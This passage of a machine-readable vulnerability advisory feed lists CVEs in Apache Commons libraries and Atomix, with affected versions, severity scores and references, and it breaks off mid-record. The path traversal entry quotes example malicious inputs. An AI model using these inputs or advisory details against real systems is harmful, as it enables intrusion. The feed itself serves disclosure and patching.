[v4.0](https://repo1.maven.org/maven2/org/apache/httpcomponents/httpclient/4.0/) of the Apache HttpComponents HttpClient module.", "affected": [ { "package": { "name": "commons-httpclient:commons-httpclient", "ecosystem": "Maven", "purl": "pkg:maven/commons-httpclient/commons-httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" } ] } ], "versions": [ "20020423", "3.0", "3.0.1", "3.1", "3.1-alpha1", "3.1-beta1", "3.1-jenkins-1", "3.1-jenkins-2", "3.1-jenkins-3", "3.1-rc1" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-3832-9276-x7gf/GHSA-3832-9276-x7gf.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-5783" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:0868" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/79984" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HTTPCLIENT-1265" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-02/msg00078.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-04/msg00040.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-04/msg00041.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-04/msg00053.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0270.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0679.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0680.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-0682.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1853.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0224.html" }, { "type": "WEB", "url": "http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [ "CWE-295" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T13:58:59Z", "nvd_published_at": "2012-11-04T22:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-78wr-2p64-hpwj", "published": "2024-10-03T12:30:48Z", "modified": "2025-01-31T15:38:02.141931Z", "aliases": [ "CVE-2024-47554" ], "related": [ "CGA-252j-5hcw-3x22", "CGA-32hx-qx96-46q6", "CGA-7c3h-fr9p-6vxc", "CGA-937h-9qvw-8r89", "CGA-9rwq-q6m2-g373", "CGA-9w8c-c5fw-q342", "CGA-g37r-p8hp-mp2c", "CGA-hr85-ppfv-vg2r", "CGA-j9w9-457f-3v67", "CGA-pwg2-7493-q9wm", "CGA-r6pw-p73w-rq5f", "CGA-v9q6-cg5v-8pf7", "CGA-vppp-hq87-2m8x", "CGA-w8v5-m4jv-f5hj", "CGA-wcj9-xx49-cqh2" ], "summary": "Apache Commons IO: Possible denial of service attack on untrusted input to XmlStreamReader", "details": "Uncontrolled Resource Consumption vulnerability in Apache Commons IO.\n\nThe `org.apache.commons.io.input.XmlStreamReader` class may excessively consume CPU resources when processing maliciously crafted input.\n\n\nThis issue affects Apache Commons IO: from 2.0 before 2.14.0.\n\nUsers are recommended to upgrade to version 2.14.0 or later, which fixes the issue.", "affected": [ { "package": { "name": "commons-io:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/commons-io/commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "fixed": "2.14.0" } ] } ], "versions": [ "2.0", "2.0.1", "2.1", "2.10.0", "2.11.0", "2.12.0", "2.13.0", "2.2", "2.3", "2.4", "2.5", "2.6", "2.7", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-78wr-2p64-hpwj/GHSA-78wr-2p64-hpwj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47554" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-io" }, { "type": "WEB", "url": "https://lists.apache.org/thread/6ozr91rr9cj5lm0zyhv30bsp317hk5z1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250131-0010" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/10/03/2" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-10-03T16:52:23Z", "nvd_published_at": "2024-10-03T12:15:02Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gwrp-pvrq-jmwv", "published": "2021-04-26T16:04:00Z", "modified": "2024-03-12T05:31:30.961796Z", "aliases": [ "CVE-2021-29425" ], "summary": "Path Traversal and Improper Input Validation in Apache Commons IO", "details": "In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.", "affected": [ { "package": { "name": "commons-io:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/commons-io/commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7" } ] } ], "versions": [ "0.1", "1.0", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.4", "2.0", "2.0.1", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.cosium.vet:vet", "ecosystem": "Maven", "purl": "pkg:maven/com.cosium.vet/vet" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "last_affected": "3.22" } ] } ], "versions": [ "1.0", "1.1", "1.11", "1.12", "1.13", "1.2", "1.3", "1.4", "1.5", "2.2", "2.3", "2.6", "2.7", "2.8", "2.9", "3.0", "3.10", "3.11", "3.12", "3.13", "3.14", "3.15", "3.16", "3.17", "3.18", "3.19", "3.22" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.diamondq.common:common-thirdparty.jcasbin", "ecosystem": "Maven", "purl": "pkg:maven/com.diamondq.common/common-thirdparty.jcasbin" }, "versions": [ "1.4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.liferay:com.liferay.sass.compiler.jsass", "ecosystem": "Maven", "purl": "pkg:maven/com.liferay/com.liferay.sass.compiler.jsass" }, "versions": [ "1.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "com.virjar:ratel-api", "ecosystem": "Maven", "purl": "pkg:maven/com.virjar/ratel-api" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "last_affected": "1.3.6" } ] } ], "versions": [ "1.0.0", "1.1.0", "1.2.0", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "net.hasor:cobble-lang", "ecosystem": "Maven", "purl": "pkg:maven/net.hasor/cobble-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.4.1" }, { "last_affected": "4.6.2" } ] } ], "versions": [ "4.4.1", "4.4.2", "4.5.0", "4.5.1", "4.5.2", "4.5.3", "4.5.4", "4.6.0", "4.6.1", "4.6.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.apache.commons:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-io" }, "versions": [ "1.3.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-io", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.servicemix.bundles/org.apache.servicemix.bundles.commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.4" }, { "last_affected": "1.5" } ] } ], "versions": [ "1.4_1", "1.4_2", "1.4_3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.checkerframework.annotatedlib:commons-io", "ecosystem": "Maven", "purl": "pkg:maven/org.checkerframework.annotatedlib/commons-io" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6" }, { "fixed": "2.7" } ] } ], "versions": [ "2.6", "2.6.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } }, { "package": { "name": "org.smartboot.servlet:servlet-core", "ecosystem": "Maven", "purl": "pkg:maven/org.smartboot.servlet/servlet-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.1.9" }, { "last_affected": "0.6" } ] } ], "versions": [ "0.1.9", "0.2", "0.2.1", "0.3", "0.3.1", "0.4", "0.5", "0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29425" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0004" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2021-29425" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/IO-556" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2021-04-26T15:21:31Z", "nvd_published_at": "2021-04-13T07:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j288-q9x7-2f5v", "published": "2025-07-11T15:31:37Z", "modified": "2025-11-05T20:34:04.566048Z", "aliases": [ "CVE-2025-48924" ], "related": [ "CGA-22cr-f3cr-c7cm", "CGA-29x5-f7v5-rrg6", "CGA-2fmr-p6rq-h6gj", "CGA-48h5-566h-rvpp", "CGA-4fcv-jq36-r7hx", "CGA-523g-m72h-8798", "CGA-6pxc-gq99-gpx4", "CGA-6v52-24xf-x875", "CGA-78fw-62xf-9rm8", "CGA-7r2r-4fw7-h3qv", "CGA-8c99-22mx-hg38", "CGA-8w2x-v747-c9c7", "CGA-8x43-fp55-w32w", "CGA-9j28-2jv5-qv67", "CGA-9rcm-4h29-rv8h", "CGA-ff3x-mc4g-82q2", "CGA-g3gg-7c6f-x6qx", "CGA-hj53-w7gr-6f9r", "CGA-j6cx-9v8j-x9cc", "CGA-j84p-prch-g8wm", "CGA-j8w2-rj92-x353", "CGA-j93m-mcxv-7hxr", "CGA-jvxv-2xch-6xjm", "CGA-m7pc-jwx3-vm7v", "CGA-mhg4-342v-w7xq", "CGA-mp4q-mrjj-8862", "CGA-p7fm-p736-2fmc", "CGA-p87f-qfxg-x45v", "CGA-pxx2-65vr-8cc4", "CGA-rc28-932p-89cv", "CGA-v52f-47gw-2xcm", "CGA-vxhq-8vpg-mr2p" ], "summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs", "details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.\n\nThe methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-lang3", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-lang3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "3.18.0" } ] } ], "versions": [ "3.0", "3.0.1", "3.1", "3.10", "3.11", "3.12.0", "3.13.0", "3.14.0", "3.15.0", "3.16.0", "3.17.0", "3.2", "3.2.1", "3.3", "3.3.1", "3.3.2", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } }, { "package": { "name": "commons-lang:commons-lang", "ecosystem": "Maven", "purl": "pkg:maven/commons-lang/commons-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "last_affected": "2.6" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924" }, { "type": "WEB", "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-lang" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-12T00:48:03Z", "nvd_published_at": "2025-07-11T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cgp8-4m63-fhh5", "published": "2022-12-03T15:30:26Z", "modified": "2023-11-08T04:06:18.513983Z", "aliases": [ "CVE-2021-37533" ], "summary": "Apache Commons Net vulnerable to information leakage via malicious server", "details": "Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client.\nThe default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.\n", "affected": [ { "package": { "name": "commons-net:commons-net", "ecosystem": "Maven", "purl": "pkg:maven/commons-net/commons-net" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.0" } ] } ], "versions": [ "1.0.0", "1.1.0", "1.2.0", "1.2.1", "1.2.2", "1.3.0", "1.4.0", "1.4.1", "2.0", "2.2", "3.0", "3.0.1", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.7.1", "3.7.2", "3.8.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-cgp8-4m63-fhh5/GHSA-cgp8-4m63-fhh5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37533" }, { "type": "WEB", "url": "https://github.com/apache/commons-net/commit/4fe1bae56e53f32756b1ca3296f3dd2c45e3e060" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-net" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/NET-711" }, { "type": "WEB", "url": "https://lists.apache.org/thread/o6yn9r9x6s94v97264hmgol1sf48mvx7" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00038.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5307" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/12/03/1" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-12-05T23:21:08Z", "nvd_published_at": "2022-12-03T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2fqw-684c-pvp7", "published": "2021-12-17T20:40:50Z", "modified": "2023-11-08T04:03:32.892349Z", "aliases": [ "CVE-2020-35213" ], "summary": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.", "details": "An issue in Atomix v3.1.5 allows attackers to cause a denial of service (DoS) via false link event messages sent to a master ONOS node.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", "1.0.0-rc6", "1.0.0-rc7", "1.0.0-rc8", "1.0.0-rc9", "1.0.1", "1.0.1-rc1", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "2.0.0", "2.0.0-alpha1", "2.0.0-raft-beta1", "2.0.0-raft-final", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.27", "2.0.28", "2.0.29", "2.0.3", "2.0.30", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.1.0-beta1", "2.1.0-beta2", "2.1.0-beta3", "3.0.0", "3.0.0-rc1", "3.0.0-rc10", "3.0.0-rc11", "3.0.0-rc12", "3.0.0-rc3", "3.0.0-rc4", "3.0.0-rc5", "3.0.0-rc6", "3.0.0-rc7", "3.0.0-rc8", "3.0.0-rc9", "3.0.1", "3.0.10", "3.0.11", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "3.0.8", "3.0.9", "3.1.0", "3.1.0-beta1", "3.1.0-beta2", "3.1.0-beta3", "3.1.0-beta4", "3.1.0-rc1", "3.1.0-rc2", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-2fqw-684c-pvp7/GHSA-2fqw-684c-pvp7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35213" }, { "type": "WEB", "url": "https://docs.google.com/presentation/d/1i8tVVGE8z9Rtl9UTwktOJpkZwT4kBVLgIk307qMiw_8/edit?usp=sharing" }, { "type": "PACKAGE", "url": "https://github.com/atomix/atomix" } ], "database_specific": { "cwe_ids": [ "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2021-12-17T18:42:16Z", "nvd_published_at": "2021-12-16T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jhc-wjr3-pwh2", "published": "2021-12-17T20:40:38Z", "modified": "2024-12-03T06:05:23.847552Z", "aliases": [ "CVE-2020-35211" ], "summary": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node.", "details": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to become the lead node in a target cluster via manipulation of the variable terms in RaftContext.", "affected": [ { "package": { "name": "io.atomix:atomix", "ecosystem": "Maven", "purl": "pkg:maven/io.atomix/atomix" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "3.1.5" } ] } ], "versions": [ "0.1.0-beta1", "0.1.0-beta2", "0.1.0-beta3", "0.1.0-beta4", "0.1.0-beta5", "1.0.0", "1.0.0-rc1", "1.0.0-rc2", "1.0.0-rc3", "1.0.0-rc4", "1.0.0-rc5", 